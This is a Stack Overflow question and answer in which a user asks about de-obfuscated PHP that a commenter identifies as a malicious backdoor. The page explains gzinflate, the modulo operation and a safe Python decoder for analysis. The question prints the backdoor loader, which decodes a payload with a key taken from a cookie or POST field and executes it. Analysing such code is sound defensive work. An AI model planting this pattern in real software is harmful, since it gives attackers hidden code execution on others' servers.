Issue

I have some PHP code that I've been decrypting (de-obfuscating) for 2 hours. I finally got it converted back into readable code, but I still have some issues understanding the algorithm used here, because of a lack of knowledge about some things in the code below.

Code

<?php
// $idk already holds the base64-decoded blob (its assignment is not shown here).
$posted = isset($_POST['posted']) ? $_POST['posted'] : (isset($_COOKIE['posted']) ? $_COOKIE['posted'] : NULL);
if ($posted !== NULL) {
    // Build the key string: md5 of the input, followed by a prefix of md5 of the reversed input.
    $posted = md5($posted) . substr(md5(strrev($posted)), 0, strlen($posted));
    for ($counter = 0; $counter < 15324; $counter++) {
        // Subtract the key byte from the blob byte, wrapped to one byte, then append the
        // recovered byte to the key so it is used for the following positions.
        $idk[$counter] = chr((ord($idk[$counter]) - ord($posted[$counter])) % 256);
        $posted .= $idk[$counter];
    }
    if ($idk = @gzinflate($idk)) {
        // Store the submitted value in a cookie; later requests read it from $_COOKIE above.
        if (isset($_POST['posted']))
            @setcookie('posted', $_POST['posted']);
        // Compile the inflated text as a PHP function and run it.
        $counter = create_function('', $idk);
        unset($idk, $posted);
        $counter();
    }
}

The $idk variable is already a value that contains a long string that's being base64 decoded.

What I Don't Understand

I understand almost all of the code, but I don't get what % 256 does in here and also I don't know what gzinflate() does.

Scott Arciszewski
asked Jan 2, 2016 at 6:55
It's a malicious backdoor. Don't spend all day investigating it; restore from backup, patch the way they got in, and move on. Commented Jan 2, 2016 at 9:06

1 Answer

So, gzinflate() un-compresses input data that is compressed with the zlib DEFLATE algorithm. The corresponding function to compress or deflate an uncompressed string is called gzdeflate(), and its manual page provides a bit more information:

This function compresses the given string using the DEFLATE data format.

For details on the DEFLATE compression algorithm see the document "DEFLATE Compressed Data Format Specification version 1.3" (RFC 1951). Sparing a few details, this is similar to compressing a file using gzip myfile.txt on the Linux command line, which would create the compressed file myfile.txt.gz. In short, this is uncompressing compressed data assigned to $idk.

$variable % 256 returns the remainder of dividing $variable by 256. If I set $variable to 258, $variable % 256 would be 2. This is often used when you want to see if a number is cleanly divisible by another number. If I wanted to show a status update every 100 times of a loop, for example, I might do:

<?php
for ($i = 1; $i <= 1000; ++$i)
{
    // Do something on each loop.
    if (($i % 100) == 0)
    {
        echo sprintf("Loop %d of 1000; %d percent complete.\n", $i, $i / 1000 * 100);
    }
}

But there are obviously many other uses.

As far as helping you figure out what exactly this source code does, I would recommend going through it step-by-step with real input and seeing what happens after each step. It will be hard for me to figure out much more about what it's doing without a lot more context.

answered Jan 2, 2016 at 7:13
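As an added illustration (not code from the question or the answer), this Python replays the decoding stage of the posted snippet over a constructed, harmless fixture and returns the inflated payload instead of executing it, which is the safe way to do the step-by-step inspection suggested above. The key value s3cret and the payload text are made-up test values; the real blob and cookie value are not on the page.

```python
import hashlib
import zlib


def derive_key(posted: str) -> bytearray:
    """Mirror of md5($posted) . substr(md5(strrev($posted)), 0, strlen($posted))."""
    raw = posted.encode("latin-1")                        # PHP strings are byte strings
    head = hashlib.md5(raw).hexdigest()                   # 32 hex characters
    tail = hashlib.md5(raw[::-1]).hexdigest()[:len(raw)]  # strrev() then substr()
    return bytearray((head + tail).encode("ascii"))


def safe_decode(blob: bytes, posted: str) -> bytes:
    """Replay the loop from the question, but return the inflated text
    instead of handing it to create_function()."""
    key = derive_key(posted)
    out = bytearray()
    for i, c in enumerate(blob):
        # chr((ord($idk[$i]) - ord($posted[$i])) % 256): PHP's chr() wraps a
        # negative remainder into 0..255, so Python's non-negative % matches.
        p = (c - key[i]) % 256
        out.append(p)
        key.append(p)                     # $posted .= $idk[$counter]: autokey extension
    # gzinflate() expects raw DEFLATE (RFC 1951): no zlib/gzip header, wbits=-15.
    return zlib.decompress(bytes(out), wbits=-15)


def build_fixture(payload: bytes, posted: str) -> bytes:
    """Constructed test input only: raw-deflate a harmless payload and apply the
    inverse of the loop above so safe_decode() has something to work on."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)        # raw DEFLATE, like gzdeflate()
    deflated = comp.compress(payload) + comp.flush()
    key = derive_key(posted)
    blob = bytearray()
    for i, p in enumerate(deflated):
        blob.append((p + key[i]) % 256)
        key.append(p)
    return bytes(blob)


if __name__ == "__main__":
    # Made-up values: the real $idk blob and cookie value are not on the page.
    sample = build_fixture(b"echo 'harmless test payload';", "s3cret")
    print(safe_decode(sample, "s3cret"))
```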
2 Comments

They do the % 256 because they're converting the value to a char, which is 1 byte wide. They could just as well have used & 255.
Thank you, that was helpful. I just figured out that the point of all this code is the last function, which injects a "malicious" cookie, I guess.
